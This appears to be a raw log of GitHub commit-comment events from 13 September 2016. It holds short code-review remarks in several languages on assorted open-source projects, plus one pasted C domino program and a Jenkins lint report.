{"id":"4553864284","type":"CommitCommentEvent","actor":{"login":"bsuttor"},"repo":{"name":"davisagli/collective.sticky"},"payload":{"comment":{"id":18997076,"position":null,"line":null,"path":null,"commit_id":"3951a722940ffa5941d06feeaf176282511f2366","created_at":"2016-09-13T07:17:58Z","updated_at":"2016-09-13T07:17:58Z","body":"Thanks, \r\nI didn't know that a 'raise AttributeError' in an indexer will not included items in the index at all"}},"created_at":"2016-09-13T07:17:58Z"}
{"id":"4553864780","type":"CommitCommentEvent","actor":{"login":"cypt"},"repo":{"name":"LeonArcher/cryptochat"},"payload":{"comment":{"id":18997079,"position":13,"line":13,"path":"app/src/main/res/layout/activity_contact_list.xml","commit_id":"3d7991bab776e10de3af64ca36c4ccca63bf9fff","created_at":"2016-09-13T07:18:06Z","updated_at":"2016-09-13T07:18:06Z","body":"Я думаю имелось в виду layout_width=\"match_parent\" layout_height=\"match_parent\""}},"created_at":"2016-09-13T07:18:06Z"}
{"id":"4553866086","type":"CommitCommentEvent","actor":{"login":"ComiR"},"repo":{"name":"kitsunet/Flowpack.ElasticSearch.ContentRepositoryAdaptor"},"payload":{"comment":{"id":18997083,"position":71,"line":256,"path":"Classes/Flowpack/ElasticSearch/ContentRepositoryAdaptor/Command/NodeIndexCommandController.php","commit_id":"9fcab09af585e4335d3884f4a82843511cb93811","created_at":"2016-09-13T07:18:26Z","updated_at":"2016-09-13T07:18:26Z","body":"`@return integer Number of indexed nodes`"}},"created_at":"2016-09-13T07:18:26Z"}
{"id":"4553867065","type":"CommitCommentEvent","actor":{"login":"azakanych"},"repo":{"name":"StasGurin/Converter"},"payload":{"comment":{"id":18997084,"position":47,"line":35,"path":"SEO/BLL/CrawlManager.cs","commit_id":"746b0efad975b0bb4b970925313a9d25fc9025a5","created_at":"2016-09-13T07:18:39Z","updated_at":"2016-09-13T07:18:39Z","body":"Respons => InitResponse"}},"created_at":"2016-09-13T07:18:39Z"}
{"id":"4553869184","type":"CommitCommentEvent","actor":{"login":"azakanych"},"repo":{"name":"StasGurin/Converter"},"payload":{"comment":{"id":18997087,"position":51,"line":38,"path":"SEO/BLL/CrawlManager.cs","commit_id":"746b0efad975b0bb4b970925313a9d25fc9025a5","created_at":"2016-09-13T07:19:15Z","updated_at":"2016-09-13T07:19:15Z","body":"don't initialize a dummy variable => use \"return\" inplace"}},"created_at":"2016-09-13T07:19:15Z"}
{"id":"4553870176","type":"CommitCommentEvent","actor":{"login":"apgv"},"repo":{"name":"apgv/TimesheetKotlinExperiment"},"payload":{"comment":{"id":18997089,"position":16,"line":32,"path":"src/main/kotlin/me/colombiano/timesheet/bootstrap/TimesheetEnvironmentLoaderListener.kt","commit_id":"3ba4a42ddb29ee3855a1b0242c762187ef12a0b2","created_at":"2016-09-13T07:19:31Z","updated_at":"2016-09-13T07:19:31Z","body":"Dette er en test"}},"created_at":"2016-09-13T07:19:31Z"}
{"id":"4553870257","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18997090,"position":null,"line":null,"path":null,"commit_id":"b84bec066f53fdf3c9b3ad60ce27a902826a2dcd","created_at":"2016-09-13T07:19:32Z","updated_at":"2016-09-13T07:19:32Z","body":"thanks, \r\n\r\noh yes, I forgot about the thumbnails, i will create a ticket for it.."}},"created_at":"2016-09-13T07:19:32Z"}
{"id":"4553872406","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":18997099,"position":null,"line":null,"path":null,"commit_id":"0d05ff40732dcb84424e8eadb681ec7a28d5d0de","created_at":"2016-09-13T07:20:10Z","updated_at":"2016-09-13T07:20:10Z","body":"cpuset does not work properly in some cases.. e.g ported roms like MIUI 8"}},"created_at":"2016-09-13T07:20:10Z"}
{"id":"4553877527","type":"CommitCommentEvent","actor":{"login":"Ivorius"},"repo":{"name":"chrisjansky/veneo"},"payload":{"comment":{"id":18997107,"position":null,"line":null,"path":null,"commit_id":"1c2e0c73eef487782133e59179e67e38c516ccd5","created_at":"2016-09-13T07:21:21Z","updated_at":"2016-09-13T07:21:21Z","body":"Mám 4.2.1. Zkusil jsem to ještě jednou na čistém repu a teď už to \nfunguje. Tak nevím jestli bylo něco v cachi nebo jsem to nějak rozbil :) \nDěkuji.\n\n\n\nDne 13. 9. 2016 v 8:58 Christian Jánský napsal(a):\n>\n> Teď jsem si repo naklonoval, dal npm install, bower install, gulp svg \n> a gulp (spuštění serveru) a vše mi funguje OK, jen fonty – \n> pochopitelně – chybí. Jakou máš verzi node? Já používám NVM a verzi \n> node 2.14.7, takže mě napadá jen chyba v tom.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/chrisjansky/veneo/commit/1c2e0c73eef487782133e59179e67e38c516ccd5#commitcomment-18996866>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AAhspaL_M6brPhUeCOywu2ZOxLufYPABks5qpkmvgaJpZM4J7Vpk>.\n>\n\n"}},"created_at":"2016-09-13T07:21:21Z"}
{"id":"4553877929","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"bclozel/spring-framework"},"payload":{"comment":{"id":18997109,"position":33,"line":131,"path":"spring-core/src/test/java/org/springframework/core/io/buffer/DataBufferUtilsTests.java","commit_id":"cc0020db027ad1185d5a0297ca161638007d9cc2","created_at":"2016-09-13T07:21:27Z","updated_at":"2016-09-13T07:21:27Z","body":"Did you run these tests with memory leak detection? See http://netty.io/wiki/reference-counted-objects.html#leak-detection-levels"}},"created_at":"2016-09-13T07:21:27Z"}
{"id":"4553880973","type":"CommitCommentEvent","actor":{"login":"NagyD"},"repo":{"name":"NagyD/SDLPoP"},"payload":{"comment":{"id":18997113,"position":null,"line":null,"path":null,"commit_id":"0a1e6192dab6cf38046e7d13a861010bd60c91dd","created_at":"2016-09-13T07:22:13Z","updated_at":"2016-09-13T07:22:13Z","body":"See issue #64 for details."}},"created_at":"2016-09-13T07:22:13Z"}
{"id":"4553883564","type":"CommitCommentEvent","actor":{"login":"adrielschmitz"},"repo":{"name":"adrielschmitz/domino"},"payload":{"comment":{"id":18997120,"position":null,"line":null,"path":null,"commit_id":"9e1a83c0ec5aa0f59a96ee2593a24cf74a059b68","created_at":"2016-09-13T07:22:54Z","updated_at":"2016-09-13T07:22:54Z","body":"#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\n#define MAX 28 /// quantidade máxima de peças;\r\n\r\n// Estrutura da peça; ----------------------------------------------------\r\ntypedef struct _peca{\r\n\tint face1; // face1 = lado esquerdo da peça;\r\n\tint face2; // face2 = lado direito da peça;\r\n\tstruct _peca *lado_esquerdo; //\r\n\tstruct _peca *lado_direito;\r\n}PecaDomino;\r\n//------------------------------------------------------------------------\r\n\r\n// FUNÇÕES ---------------------------------------------------------------\r\nPecaDomino *inicia();\r\nPecaDomino *insere_inicio(PecaDomino *l, PecaDomino *p);\r\nPecaDomino *insere_fim(PecaDomino *l, PecaDomino *p);\r\nPecaDomino *cria_jogo();\r\n//------------------------------------------------------------------------\r\n\r\nint main(void){\r\n\tint i, n; \r\n\tPecaDomino *jogador = (PecaDomino*)malloc(sizeof(PecaDomino));\r\n\tPecaDomino *mesa = (PecaDomino*)malloc(sizeof(PecaDomino));\r\n\tPecaDomino *comprar = (PecaDomino*)malloc(sizeof(PecaDomino));\r\n\tPecaDomino *maquina = (PecaDomino*)malloc(sizeof(PecaDomino));\r\n\tPecaDomino *pecaJogada = (PecaDomino*)malloc(sizeof(PecaDomino));\r\n\tjogador = inicia();\r\n\tmesa = inicia();\r\n\tcomprar = inicia();\r\n\tmaquina = inicia();\r\n\r\n\r\n// bloco comparando se a peça jogada é equivalente a algum lado da mesa\r\n\tif(mesa->face1 == pecaJogada.face1){\r\n\t\tinsere_inicio(*mesa, *pecaJogada);\r\n\t}else if(mesa->face2 == pecaJogada.face2){\r\n\t\tinsere_fim(*mesa, *pecaJogada);\r\n\t}else{\r\n\t\t//comprar();\r\n\t}\r\n//---------------------------------------------------------------------\r\n\treturn 0;\r\n}\r\n// FIM DA MAIN------------------------------------------------------------\r\n\r\nPecaDomino *inicia(){\r\n\treturn NULL;\r\n}\r\n\r\nPecaDomino *insere_inicio(PecaDomino *l, PecaDomino *p){\r\n\tPecaDomino *novo = (PecaDomino*)malloc(sizeof(PecaDomino));\r\n\tnovo->face1 = p->face1;\r\n\tnovo->face2 = p->face2;\r\n\tnovo->lado_esquerdo = NULL;\r\n\tif(novo){\r\n\t\tif(l == NULL){\r\n\t\t\tnovo->lado_direito = NULL;\r\n\t\t\treturn novo;\r\n\t\t}\r\n\t}else{\r\n\t\tprintf(\"Impossível alocar memória!\\n\");\r\n\t\treturn 0;\r\n\t} \r\n\tnovo->lado_direito = l;\r\n\tl->lado_esquerdo = novo;\r\n\treturn novo;\r\n}\r\n\r\nPecaDomino *insere_fim(PecaDomino *l, PecaDomino *p){\r\n\tPecaDomino *novo = (PecaDomino*)malloc(sizeof(PecaDomino));\r\n\tnovo->face1 = p->face1;\r\n\tnovo->face2 = p->face2;\r\n\tnovo->lado_direito = NULL;\r\n\tif(novo){\r\n\t\tif(l == NULL){\r\n\t\t\tnovo->lado_direito = NULL;\r\n\t\t\treturn novo;\r\n\t\t}\r\n\t}else{\r\n\t\tprintf(\"Impossível alocar memória!\\n\");\r\n\t\treturn 0;\r\n\t}\r\n\tPecaDomino *aux = l;\r\n\twhile(aux->lado_direito != NULL){\r\n\t\taux = aux->lado_direito;\r\n\t}\r\n\taux->lado_direito = novo;\r\n\tnovo->lado_esquerdo = aux;\r\n\treturn l;\r\n}\r\n\r\nPecaDomino *cria_jogo(){\r\n\tint i, j, cont=0;\r\n\tPecaDomino *novo = (PecaDomino*)malloc(sizeof(PecaDomino));\r\n// Na primeira rodada, o jogo começará com a peça |0-0|, então verificará se algum jogador tem alguma peça com a ponta 0 na mão...\r\n\tnovo->face1 = 0;\r\n\tnovo->face2 = 0;\r\n\tnovo->lado_esquerdo = NULL;\r\n\tPecaDomino *aux, *ant = novo;\r\n\t// Distribuição das peças --------------------------------------------------------\r\n\twhile(cont<MAX){\r\n\t\tfor(i=1; i<7; i++){\r\n\t\t\tfor(j=0; j<=i; j++){\r\n\t\t\t\taux = (PecaDomino *)malloc(sizeof(PecaDomino));\r\n\t\t\t\taux->face1 = i; // o lado esquerdo da peça recebe o numero de i;\r\n\t\t\t\taux->face2 = j; // o lado direito da peça recebe o numero de j;\r\n\t\t\t\taux->lado_esquerdo = ant;\r\n\t\t\t\tant->lado_direito = aux;\r\n\t\t\t\tant = aux;\r\n\t\t\t}\r\n\t\t}\r\n\t\tcont++;\r\n\t}\r\n\t//--------------------------------------------------------------------------------\r\n\taux->lado_direito = NULL; // lado direito da peça aponta pra NULL, indicando o final da fila;\r\n\treturn novo;\r\n}\r\n\r\n"}},"created_at":"2016-09-13T07:22:54Z"}
{"id":"4553884221","type":"CommitCommentEvent","actor":{"login":"cypt"},"repo":{"name":"LeonArcher/cryptochat"},"payload":{"comment":{"id":18997122,"position":24,"line":24,"path":"app/src/main/java/com/streamdata/leon/cryptochat/models/Message.java","commit_id":"3d7991bab776e10de3af64ca36c4ccca63bf9fff","created_at":"2016-09-13T07:23:04Z","updated_at":"2016-09-13T07:23:04Z","body":"Поля тоже принято писать CamelCase - sentTime"}},"created_at":"2016-09-13T07:23:04Z"}
{"id":"4553887301","type":"CommitCommentEvent","actor":{"login":"azakanych"},"repo":{"name":"StasGurin/Converter"},"payload":{"comment":{"id":18997133,"position":4,"line":31,"path":"SEO/BLL/CrawlManager.cs","commit_id":"0f59a627a49d0624ab2d3126d0b4f034238d2073","created_at":"2016-09-13T07:23:51Z","updated_at":"2016-09-13T07:23:51Z","body":"In order to make a fast search we should load all Crawl Data into memory and keep it alive for further requests. In-memory search will be more efficient."}},"created_at":"2016-09-13T07:23:51Z"}
{"id":"4553892826","type":"CommitCommentEvent","actor":{"login":"Holmistr"},"repo":{"name":"Holmistr/database-sqlite"},"payload":{"comment":{"id":18997144,"position":null,"line":null,"path":null,"commit_id":"ed223ef2c527aacb9ad54ba312c565b5be1ba578","created_at":"2016-09-13T07:25:19Z","updated_at":"2016-09-13T07:25:19Z","body":"Version updated in next commit."}},"created_at":"2016-09-13T07:25:19Z"}
{"id":"4553898259","type":"CommitCommentEvent","actor":{"login":"aeden"},"repo":{"name":"dnsimple/dnsimple-elixir"},"payload":{"comment":{"id":18997147,"position":null,"line":null,"path":null,"commit_id":"a1dd60581692ceb100f5c4cd56a9652df9b38af4","created_at":"2016-09-13T07:26:40Z","updated_at":"2016-09-13T07:26:40Z","body":"I'm 👍  on switching to using the internal decoding mechanism from httpoison if it does the job."}},"created_at":"2016-09-13T07:26:40Z"}
{"id":"4553900117","type":"CommitCommentEvent","actor":{"login":"Brances"},"repo":{"name":"jkpang/PPNetworkHelper"},"payload":{"comment":{"id":18997150,"position":null,"line":null,"path":null,"commit_id":"1fa6c6c69b7335b01838071c4c11bc1f42740e22","created_at":"2016-09-13T07:27:09Z","updated_at":"2016-09-13T07:27:09Z","body":"渍渍 。"}},"created_at":"2016-09-13T07:27:09Z"}
{"id":"4553900427","type":"CommitCommentEvent","actor":{"login":"Binamebou"},"repo":{"name":"Binamebou/apiary.xapi.eprfile"},"payload":{"comment":{"id":18997152,"position":null,"line":null,"path":null,"commit_id":"0e1c2b70f1dc9825efb96d32a8ae506d5c7fece1","created_at":"2016-09-13T07:27:12Z","updated_at":"2016-09-13T07:27:12Z","body":"__apiary.manifest contains reference to non-existent file in repository.__ (Autogenerated message from apiary.io)\n+ apiary.apib"}},"created_at":"2016-09-13T07:27:12Z"}
{"id":"4553906216","type":"CommitCommentEvent","actor":{"login":"Honry"},"repo":{"name":"siovene/cordova-plugin-ocf-demo"},"payload":{"comment":{"id":18997163,"position":6,"line":26,"path":"README.md","commit_id":"1c17798489df2208255ee050105e4b91d97fffa1","created_at":"2016-09-13T07:28:43Z","updated_at":"2016-09-13T07:28:43Z","body":"'s/created/created by', 's/recommend you/recommend you to'"}},"created_at":"2016-09-13T07:28:43Z"}
{"id":"4553906659","type":"CommitCommentEvent","actor":{"login":"SpencerHarper"},"repo":{"name":"SpencerHarper/python"},"payload":{"comment":{"id":18997165,"position":null,"line":null,"path":null,"commit_id":"1b901b8402a43fa626d5f869cad84bd4833ea7ac","created_at":"2016-09-13T07:28:50Z","updated_at":"2016-09-13T07:28:50Z","body":"wtf is a cource?"}},"created_at":"2016-09-13T07:28:50Z"}
{"id":"4553907459","type":"CommitCommentEvent","actor":{"login":"stephanemaillard"},"repo":{"name":"stephanemaillard/rn-splash-screen"},"payload":{"comment":{"id":18997167,"position":null,"line":null,"path":null,"commit_id":"c1e0362878fa2cd3330f05d82b3123a531ad1c4d","created_at":"2016-09-13T07:29:02Z","updated_at":"2016-09-13T07:29:02Z","body":"@mehcode I had to use a picture for the splashscreen and it was deformated on some ratio of devices on Android. The easiest method I found was to use the center crop attribute of an ImageView. But using a picture does not really follow the guidelines of a proper splashscreen so it was more a \"hack\" for a specific project."}},"created_at":"2016-09-13T07:29:02Z"}
{"id":"4553910359","type":"CommitCommentEvent","actor":{"login":"ruffy91"},"repo":{"name":"CyanogenMod/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":18997177,"position":null,"line":null,"path":null,"commit_id":"6277febe58e0e7a802308cde4aaf02c2c5489c4a","created_at":"2016-09-13T07:29:45Z","updated_at":"2016-09-13T07:29:45Z","body":"Why was \"AES core cipher using ARMv8 Crypto Extensions\" disabled?"}},"created_at":"2016-09-13T07:29:45Z"}
{"id":"4553911264","type":"CommitCommentEvent","actor":{"login":"Wolgo"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":18997182,"position":null,"line":null,"path":null,"commit_id":"72ee6ae3aec24518ab5ad2447790b49049e0d6c1","created_at":"2016-09-13T07:29:58Z","updated_at":"2016-09-13T07:29:58Z","body":"Branch was merged and then repushed because of lack of communication."}},"created_at":"2016-09-13T07:29:58Z"}
{"id":"4553913667","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18997187,"position":null,"line":null,"path":null,"commit_id":"2b000d672ba3143d344fedc30f57bdfe1fa322fa","created_at":"2016-09-13T07:30:33Z","updated_at":"2016-09-13T07:30:33Z","body":"@vangheem Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/48/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:196:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:244:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:325:1: C901 'decode' is too complex (13)\nplone/tiles/directives.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-13T07:30:33Z"}
{"id":"4553915304","type":"CommitCommentEvent","actor":{"login":"alexbiehl"},"repo":{"name":"boj/garbage"},"payload":{"comment":{"id":18997191,"position":126,"line":126,"path":"src/NaiveGame0.hs","commit_id":"69f38aa57faebdce13408bdab6e05c1ad3d65ffb","created_at":"2016-09-13T07:30:58Z","updated_at":"2016-09-13T07:30:58Z","body":"In the rust code, they use fixed size vectors. You should too! \r\n\r\nTry the vector package with module Data.Vector.Unboxed. Change your `Chunk` type to `(Float, Float, Float)` so you get an `Unbox` instance to work with. This way you store the chunks in flat in contigous memory. "}},"created_at":"2016-09-13T07:30:58Z"}
{"id":"4553916841","type":"CommitCommentEvent","actor":{"login":"baixiaoyu"},"repo":{"name":"box/Anemometer"},"payload":{"comment":{"id":18997193,"position":null,"line":null,"path":null,"commit_id":"27c9afd3b3d18e00120e2eba66a0997b4a2de63f","created_at":"2016-09-13T07:31:21Z","updated_at":"2016-09-13T07:31:21Z","body":"I have solved it"}},"created_at":"2016-09-13T07:31:21Z"}
{"id":"4553918651","type":"CommitCommentEvent","actor":{"login":"YoshinoriSaito"},"repo":{"name":"YoshinoriSaito/ysaitoprogram"},"payload":{"comment":{"id":18997195,"position":9,"line":9,"path":"160913insrt.php","commit_id":"424a2cf94d72dbcdac459d148b1b918894b3d670","created_at":"2016-09-13T07:31:47Z","updated_at":"2016-09-13T07:31:47Z","body":"分かりやすい説明、ありがとうございます。\r\nこちらはこちらで情報を読み進めます。\r\n次はDB作成へチャレンジした方がよろしいでしょうか？"}},"created_at":"2016-09-13T07:31:47Z"}
{"id":"4553918880","type":"CommitCommentEvent","actor":{"login":"alexbiehl"},"repo":{"name":"boj/garbage"},"payload":{"comment":{"id":18997197,"position":126,"line":126,"path":"src/NaiveGame0.hs","commit_id":"69f38aa57faebdce13408bdab6e05c1ad3d65ffb","created_at":"2016-09-13T07:31:51Z","updated_at":"2016-09-13T07:31:51Z","body":"Also, try to avoid `Integer` in high performance code. It handles arbitrary precision intergers but comes at a cost. Try using `Int` instead."}},"created_at":"2016-09-13T07:31:51Z"}
{"id":"4553923446","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18997220,"position":4,"line":28,"path":"std/Math.hx","commit_id":"5b8bc7dd3dfb8999df8d86ccfdb9273dcc933d36","created_at":"2016-09-13T07:33:02Z","updated_at":"2016-09-13T07:33:02Z","body":"I'm assuming this is fine because there doesn't appear to be any function which is specified to throw an exception."}},"created_at":"2016-09-13T07:33:02Z"}
{"id":"4553927165","type":"CommitCommentEvent","actor":{"login":"kito-cheng"},"repo":{"name":"kito-cheng/riscv-binutils-gdb"},"payload":{"comment":{"id":18997234,"position":null,"line":null,"path":null,"commit_id":"64f1b5dfe90f4d0e264a9f13942aa29d2c8cb44e","created_at":"2016-09-13T07:33:58Z","updated_at":"2016-09-13T07:33:58Z","body":"thank for your review, we will fix it :)"}},"created_at":"2016-09-13T07:33:58Z"}
{"id":"4553928015","type":"CommitCommentEvent","actor":{"login":"LatvianModder"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18997236,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T07:34:13Z","updated_at":"2016-09-13T07:34:13Z","body":"My only comment on this is that instead of deserializing default implementation, it should have IEnergyStorageModifiable, just like with inventories. Otherwise, i think this is great"}},"created_at":"2016-09-13T07:34:13Z"}
{"id":"4553928037","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18997238,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-13T07:34:13Z","updated_at":"2016-09-13T07:34:13Z","body":"How to deal with DRAM clockspeeds differing from the 624 MHz we use now?"}},"created_at":"2016-09-13T07:34:13Z"}
{"id":"4553931555","type":"CommitCommentEvent","actor":{"login":"gauravkumar28"},"repo":{"name":"gauravkumar28/codearjun"},"payload":{"comment":{"id":18997246,"position":38,"line":38,"path":"javaapplication36/JavaApplication36.java","commit_id":"5bbadb85145bf678fa4bb693bb41672954781b21","created_at":"2016-09-13T07:35:06Z","updated_at":"2016-09-13T07:35:06Z","body":"Same as above while loop.\r\n\r\nTry Input:\r\n\r\ns1 = abcd \r\nand s2 = abcd"}},"created_at":"2016-09-13T07:35:06Z"}
{"id":"4553932963","type":"CommitCommentEvent","actor":{"login":"NogginBops"},"repo":{"name":"NogginBops/ProjectPorcupine"},"payload":{"comment":{"id":18997249,"position":4,"line":4,"path":"Assets/StreamingAssets/Images/Furniture/compressor_oxygen.skon","commit_id":"79f909a74c573448b552d88e7556892409d777cb","created_at":"2016-09-13T07:35:26Z","updated_at":"2016-09-13T07:35:26Z","body":"Here are a few tabs in here :scream: "}},"created_at":"2016-09-13T07:35:26Z"}
{"id":"4553940797","type":"CommitCommentEvent","actor":{"login":"brinxmat"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":18997261,"position":4,"line":4,"path":"redef/services/src/main/java/no/deichman/services/entity/z3950/Labeled.java","commit_id":"a3bf4d65d96406ff01bfbdffc4c05d5a32e32b42","created_at":"2016-09-13T07:37:20Z","updated_at":"2016-09-13T07:37:20Z","body":"Responsibility?"}},"created_at":"2016-09-13T07:37:20Z"}
{"id":"4553944152","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18997264,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-13T07:38:10Z","updated_at":"2016-09-13T07:38:10Z","body":"Create a new patch for all config files, including new ones?"}},"created_at":"2016-09-13T07:38:10Z"}
{"id":"4553945624","type":"CommitCommentEvent","actor":{"login":"NagyD"},"repo":{"name":"NagyD/SDLPoP"},"payload":{"comment":{"id":18997267,"position":null,"line":null,"path":null,"commit_id":"d63893fdfffe18b957514342ca2509442ac96f1a","created_at":"2016-09-13T07:38:32Z","updated_at":"2016-09-13T07:38:32Z","body":"> I wonder if `rem_min` was signed in the original DOS source...\r\n\r\nI guess it was:\r\nIn the disassembly, the `cmp rem_min, <number>` is followed by `jle` and `jl` for `<=` and `<` comparisons.\r\nIn x86 assembly, `jle` is the *signed* less-or-equal, while the *unsigned* version would be `jbe` (below-or-equal).\r\n\r\nProbably most other variables that are currently declared as unsigned were signed instead, but there is no visible difference due to the way they are used. (Boolean variables are a good example of this.)\r\n"}},"created_at":"2016-09-13T07:38:32Z"}
{"id":"4553951747","type":"CommitCommentEvent","actor":{"login":"bartsch-dev"},"repo":{"name":"bartsch-dev/jabref"},"payload":{"comment":{"id":18997273,"position":14,"line":124,"path":"build.gradle","commit_id":"46cf03a7f231958193e6d46f9a97c17da554c2a4","created_at":"2016-09-13T07:40:03Z","updated_at":"2016-09-13T07:40:03Z","body":"I already did in a later commit https://github.com/JabRef/jabref/pull/1928/commits/ac4f5cc9ec74cacc1a39746726ba396446e0475f#diff-c197962302397baf3a4cc36463dce5eaR128"}},"created_at":"2016-09-13T07:40:03Z"}
{"id":"4553954622","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18997277,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-13T07:40:46Z","updated_at":"2016-09-13T07:40:46Z","body":"BTW now we have Ethernet for H3 boards in u-boot :smile: "}},"created_at":"2016-09-13T07:40:46Z"}
{"id":"4553958226","type":"CommitCommentEvent","actor":{"login":"adrianbroher"},"repo":{"name":"freeorion/freeorion"},"payload":{"comment":{"id":18997284,"position":null,"line":null,"path":null,"commit_id":"6875fd238a375618d6f32d63b6501ef8500a641a","created_at":"2016-09-13T07:41:40Z","updated_at":"2016-09-13T07:41:40Z","body":"@Vezzra requesting this commit to be cherry picked for release 0.4.6"}},"created_at":"2016-09-13T07:41:40Z"}
{"id":"4553958989","type":"CommitCommentEvent","actor":{"login":"psychon"},"repo":{"name":"i3/i3"},"payload":{"comment":{"id":18997285,"position":41,"line":45,"path":"libi3/get_colorpixel.c","commit_id":"287a0b4c3cc24a18f5063b7d5743f0b85d6852a1","created_at":"2016-09-13T07:41:53Z","updated_at":"2016-09-13T07:41:53Z","body":"That's not how you check for a visual to be true color, but finding the `xcb_visualtype_t` for `root_screen->root_visual` and checking its `->class == XCB_VISUAL_CLASS_TRUE_COLOR` is a non-trivial amount of code and would also require this code to handle `->red_mask` etc correctly...\r\n\r\nI think that this needs the following check (I don't know the code base, I just grepped for the info I need!):\r\n```\r\nif (visual_type->_class == XCB_VISUAL_CLASS_TRUE_COLOR && visual_type->red_mask = 0xff0000 && visual_type->green_mask == 0xff00 && visual_type->blue_mask == 0xff)\r\n```\r\n(Perhaps also check `visual_type->bits_per_rgb_value == 8`, but I'm not sure about the exact meaning of this field.)"}},"created_at":"2016-09-13T07:41:53Z"}
{"id":"4553961331","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/webip"},"payload":{"comment":{"id":18997287,"position":null,"line":null,"path":null,"commit_id":"d34ea3f3b3018acacec810922d8bc7c1e83fa9aa","created_at":"2016-09-13T07:42:28Z","updated_at":"2016-09-13T07:42:28Z","body":"#19 aggiornamento a rails 5"}},"created_at":"2016-09-13T07:42:28Z"}
{"id":"4553962274","type":"CommitCommentEvent","actor":{"login":"AirOne70"},"repo":{"name":"PureNexusProject/android_frameworks_base"},"payload":{"comment":{"id":18997288,"position":null,"line":null,"path":null,"commit_id":"900a62158f8dd383b9e1b79a0409864df6624dda","created_at":"2016-09-13T07:42:42Z","updated_at":"2016-09-13T07:42:42Z","body":"And what about Brightness slider toggle ?\r\n\r\n`    <com.android.systemui.tuner.TunerSwitch\r\n        android:key=\"qs_show_brightness\"\r\n        android:title=\"@string/show_brightness\"\r\n        sysui:defValue=\"true\" />\r\n`"}},"created_at":"2016-09-13T07:42:42Z"}
{"id":"4553970301","type":"CommitCommentEvent","actor":{"login":"stapelberg"},"repo":{"name":"i3/i3"},"payload":{"comment":{"id":18997298,"position":41,"line":45,"path":"libi3/get_colorpixel.c","commit_id":"287a0b4c3cc24a18f5063b7d5743f0b85d6852a1","created_at":"2016-09-13T07:44:42Z","updated_at":"2016-09-13T07:44:42Z","body":"Let’s take this to an issue, where discussion is a little more visible/convenient: https://github.com/i3/i3/issues/2452"}},"created_at":"2016-09-13T07:44:42Z"}
{"id":"4553970609","type":"CommitCommentEvent","actor":{"login":"earthgecko"},"repo":{"name":"russss/pydsn"},"payload":{"comment":{"id":18997299,"position":72,"line":72,"path":"parser.py","commit_id":"fd901137b3f5b672f3c873c51c1c3630710d4222","created_at":"2016-09-13T07:44:47Z","updated_at":"2016-09-13T07:44:47Z","body":"Thank you"}},"created_at":"2016-09-13T07:44:47Z"}
{"id":"4553976065","type":"CommitCommentEvent","actor":{"login":"pachiara"},"repo":{"name":"pachiara/pubblicalo"},"payload":{"comment":{"id":18997306,"position":null,"line":null,"path":null,"commit_id":"3ed717d6b60b4674e94463ef5d14b1fb70be6829","created_at":"2016-09-13T07:46:07Z","updated_at":"2016-09-13T07:46:07Z","body":"#1 aggiornamento a rails 5"}},"created_at":"2016-09-13T07:46:07Z"}
{"id":"4553979705","type":"CommitCommentEvent","actor":{"login":"lovesunstar"},"repo":{"name":"lovesunstar/STKit"},"payload":{"comment":{"id":18997310,"position":null,"line":null,"path":null,"commit_id":"b03bf8faba65494e3c952d695d7127cc72f3908a","created_at":"2016-09-13T07:46:53Z","updated_at":"2016-09-13T07:46:53Z","body":"这个在 iOS 8 之后可以使用 messageHandler 的方式了，并且 iOS 7 也可以使用 JSContext 来解决类似的问题，所以这个不需要了。"}},"created_at":"2016-09-13T07:46:53Z"}
{"id":"4553981018","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18997313,"position":null,"line":null,"path":null,"commit_id":"866737e83062d322d8817ec34aaeff50ff5c627b","created_at":"2016-09-13T07:47:14Z","updated_at":"2016-09-13T07:47:14Z","body":"Note that the X3G Writer currently contains a binary and only works for Windows. Plan is to automate the building of that plug-in one day so it can work for all supported platforms."}},"created_at":"2016-09-13T07:47:14Z"}
